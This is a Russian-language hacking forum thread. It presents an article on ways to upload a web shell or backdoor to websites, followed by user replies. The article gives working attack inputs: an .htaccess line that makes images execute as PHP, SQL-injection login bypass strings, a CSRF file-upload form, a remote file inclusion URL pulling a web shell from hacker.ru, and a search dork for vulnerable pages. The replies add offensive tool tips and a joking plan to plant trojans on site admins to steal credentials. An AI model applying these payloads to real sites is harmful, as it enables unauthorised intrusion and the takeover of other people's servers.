Статья Способы загрузки шелла/бэкдора на сайт.

В этой статье я хочу рассказать о чаще используемых способах заливки шелла на сайт. Web-shell - это некий вредоносный скрипт (программа), который злоумышленники используют для управления сайтами или серверами.

Способ 1

Найти на сайте форму для загрузки файлов/картинок. Допустим нам не удалось взломать админку сайта и мы пытаемся залить наш шелл с расширением .php.jpg . Если удалось, то мы увидим вместо картинки белое окно, мы кликаем правой кнопкой мыши и переходим по ссылке. В случае провала мы можем воспользоваться расширением chrome tamper data. Оно позволяет перехватить и изменить запрос как вы хотите. Если сайт проверяет, расширение файла, то сначала мы можем залить .htaccess файл с содержимым:
Код:
AddType application/x-httpd-php .jpg
Данная команда будет выполнять jpg файлы как php.
Подробная видеоинструкция:

Видеоинструкция по установке tamper data:

Способ 2
Воспользоваться программой для поиска админок на сайте - https://github.com/bdblackhat/admin-panel-finder. Когда программа нашла админку мы можем попробовать провести sql-injection. В поле логина и пароля сайта мы вбиваем код:
Код:
' or '1'='1
' OR 1=1/*
Если срабатывает, то мы попадаем в админку и действуем по 1 способу . Если же на сайте в панели администратора нет sql-injection, тогда мы можем попробовать сбрутить или же найти эксплоит под данную CMS.
Подробная видеоинструкция:

Способ 3

В 3 способе мы будем искать sql-injection на самом сайте. Мы может делать это вручную или же воспользуемся . На форуме достаточно тем, как можно проводить инъекции, так что зайду издалека. Итак, вот мы уже нашли таблицу с логином и паролем админа расшифровываем хэши заходим в админку и радуемся. Но допустим мы не смогли расшифровать пароль и все накрылось медным тазом, тогда мы должны проверить привилегии нашего юзера. Проверяем привилегии и загружаем мини-шелл. По каким-то причинам когда я хочу вставить код сайт выдает ошбику .


Способ 4
4 способ подразумевает csrf атаку. В ниже приведенном коде нам нужно заменить http:// на ссылку нашей цели. Выбрать шелл и нажать кнопку upload.
Код:
<form method="POST" action="http://" enctype="multipart/form-data" >
<input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form>
Подробная видеоинструкция:

Способ 5
Узнать как больше о вашей цели и подыскать эксплоит. Для этого есть очень интересный сайт - . Никто и не отменял массовый взлом сайтов через уязвимости, но про это уже есть статья на форме.

Существует еще множество способов заливки шелла и рассказывать о каждом нет смысла. Если вы хотите потренироваться, то установите dvwa - это программа созданная для того, чтобы помочь профессионалам по безопасности протестировать их навыки и инструменты в легальном окружении .
 
Способ 6
Php-injection - это форма атаки на сайт, когда атакующий внедряет свой php-код в атакуемое php-приложение.
Код:
www.site.ru?page=home.html
Выполнив команду мы подгрузим страницу home,html. Теперь мы попробуем подгрузить вредоносный шелл.

Код:
www.site.ru?page=http:/hacker.ru/webshell.php
Дорк: Inurl:page=

Также есть способ найти уже залитый шелл с помощью perl скрипта.
Подробная видеоинструкция:
 
Я знаю способ который срабатывает на 100%, но почему то не разу не видел чтобы его выкладывали, он очень простой и я без мануалов его нашёл, бурп + файл. А у вас как то все замудрено) но спасибо большое за труды! Обязательно попробую ваши методы! Пишите ещё! Очень интересно!

А вот эти jpg.php php.jpg не пролезут на сервак,

Интересно почему его все скрывают...
 
  • Нравится
Реакции: erlan1749
Ребята :) наберитесь терпения. Ждём выпуска статьи от нашего мембера “mr.ondrik” он по этой теме собрался в конкурсе участвовать и раскатает статью на более чем 3000 знаков. Там все будет в подробностях.
 
  • Нравится
Реакции: Ondrik8 и prox00
Я знаю способ который срабатывает на 100%, но почему то не разу не видел чтобы его выкладывали, он очень простой и я без мануалов его нашёл, бурп + файл. А у вас как то все замудрено) но спасибо большое за труды! Обязательно попробую ваши методы! Пишите ещё! Очень интересно!

А вот эти jpg.php php.jpg не пролезут на сервак,

Интересно почему его все скрывают...
через бурп пролезит)
 
  • Нравится
Реакции: Ondrik8
Я знаю способ который срабатывает на 100%, но почему то не разу не видел чтобы его выкладывали, он очень простой и я без мануалов его нашёл, бурп + файл. А у вас как то все замудрено) но спасибо большое за труды! Обязательно попробую ваши методы! Пишите ещё! Очень интересно!

А вот эти jpg.php php.jpg не пролезут на сервак,

Интересно почему его все скрывают...
и как это сделать можешь расписать или в личку скинуть.
 
  • Нравится
Реакции: Fess_blackwood
Мне тоже такое интересно)
и как это сделать можешь расписать или в личку скинуть.

В 11-ой лабаратории Pentestit реализовывался такой вектор атаки. Информация: и . В разделах о CRM.
 
  • Нравится
Реакции: prox00 и Ondrik8
Было бы интересно узнать о поиске уязвимых сайтов, в интернете не так много информации на эту тему, а SQL Dumper это уже зашквар)))
 
Благодарю за статью. особенно за способ №2
Было бы интересно узнать о поиске уязвимых сайтов, в интернете не так много информации на эту тему, а SQL Dumper это уже зашквар)))
Не пользовался SQL Dumper, но насколько знаю это скрипт для дампа БД, не понимаю чем это может быть зашквар, по твоему нужно все руками дампить. Можно ещё вместо гидры руками пароли вводить. Если вы знаете как пользоваться инструментом, то ничего плохого в его использовании нет,не зависимо от
для поиска уязвимостей на рандоме можно пользоваться SQLiv и v3n0m. Для поиска на конкретном сайте пользуйтесь прокси вроде WebScarab, Burp или ZAP. А как найдете пускайте в SQLmap.
 
  • Нравится
Реакции: DefWolf, n01n02h и Aceki
Все гораздо проще гайсы))))
Берется сперва ищется вектор для загрузки веб шелла)
К примеру если CMS WordPress или Joomla последней версии без уязвимых плагинов - то загрузка шелла только после доступа к админ панели возможна))) И никакие тампер дата и выше описанные методы не помогут , и даже супер пупер универсальные))) Хеххех))
Если бы был супер универсальный метод у этого мембера то он бы в комментах не писал а заскринил залитый шелл на этом форуме)
 
Универсальный метод заливки существует:
1. Админу подсовываем троян, ратник и прочее...
2.Тырим пароли от фтп, админки и прочее...
3.Заливаем шелл.
ПРОФИТ!!!!
:) Данный способ пойдет как статья на конкурс?)))))))
 
  • Нравится
Реакции: <~DarkNode~>
Универсальный метод заливки существует:
1. Админу подсовываем троян, ратник и прочее...
2.Тырим пароли от фтп, админки и прочее...
3.Заливаем шелл.
ПРОФИТ!!!!
:) Данный способ пойдет как статья на конкурс?)))))))
Хм... это не универсальный метод.
Универсальный метод - это терморектальный криптоанализ и ему подобные техники)
 
  • Нравится
Реакции: N4sty, woolf1514 и prox00
Статья интересная
На лучше использовать burp в ней выполняется все в два шага.
Спасибо за статью
 
Я знаю способ который срабатывает на 100%, но почему то не разу не видел чтобы его выкладывали, он очень простой и я без мануалов его нашёл, бурп + файл. А у вас как то все замудрено) но спасибо большое за труды! Обязательно попробую ваши методы! Пишите ещё! Очень интересно!

А вот эти jpg.php php.jpg не пролезут на сервак,

Интересно почему его все скрывают...
Универсальный метод заливки существует:
1. Админу подсовываем троян, ратник и прочее...
2.Тырим пароли от фтп, админки и прочее...
3.Заливаем шелл.
ПРОФИТ!!!!
:) Данный способ пойдет как статья на конкурс?)))))))
Статья интересная
На лучше использовать burp в ней выполняется все в два шага.
Спасибо за статью
вот трое понтанулись что знают способы и не одной статьи)) выводы знаем только в теории и то "это не точно"))
 
  • Нравится
Реакции: jonni_vu и DefWolf
просто "бурпсюте" своего рода "швейцарский нож" для пентеста web с кучей дополнительных возможностей и плагинов, а утилита предложенная автором "темпер дата", лишь узко заточенная утилита)))
Надеюсь пользователи сайта будут более терпимыми друг к другу

---- Добавлено позже ----

друзья почему столько негатива)))
лишь о общении рождается истина)))
 
Последнее редактирование модератором:
  • Нравится
Реакции: ghost и prox00
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!